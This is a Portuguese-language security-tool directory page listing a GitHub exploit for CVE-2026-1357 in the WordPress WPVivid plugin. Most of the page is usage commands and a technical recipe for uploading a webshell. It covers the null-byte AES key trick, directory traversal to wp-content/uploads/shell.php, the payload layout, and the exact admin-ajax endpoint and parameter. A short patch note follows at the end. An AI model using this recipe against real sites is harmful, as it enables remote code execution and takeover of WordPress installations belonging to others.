Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Exploit-CVE-2026-1357 — Exploit for CVE-2026-1357 in WordPress WPVivid plugin, enabling remote code execution via crafted AES-encrypted payloads and directory traversal to upload a webshell. | Kitploit
Ferramentas/GitHubGitHub/itsismarcos/exploit-cve-2026-1357
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubitsismarcos/exploit-cve-2026-1357

Exploit-CVE-2026-1357

Exploit for CVE-2026-1357 in WordPress WPVivid plugin, enabling remote code execution via crafted AES-encrypted payloads and directory traversal to upload a webshell.

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Instalar dependências

pip3 install pycryptodome requests

Exploit básico

python3 wpvivi.py http://target.com

Webshell customizada

python3 wpvivi.py http://target.com --shell backdoor.php

python3 wpvivi.py http://target.com --code "" Explicação técnica: Null Byte Key: Quando RSA decrypt falha, retorna false, que phpseclib trata como "\x00\x00\x00". Usamos 16 null bytes como chave AES-128 ECB. Directory Traversal: Filename não é sanitizado, permitindo ../../../../wp-content/uploads/shell.php Payload Format:

[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] Execução: POST para /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(payload criptografado) Detecção e Mitigação:

Patched em 0.9.124:

  • Check if ($key === false || empty($key)) return false;
  • Extension whitelist: zip,gz,tar,sql
Baixar ferramenta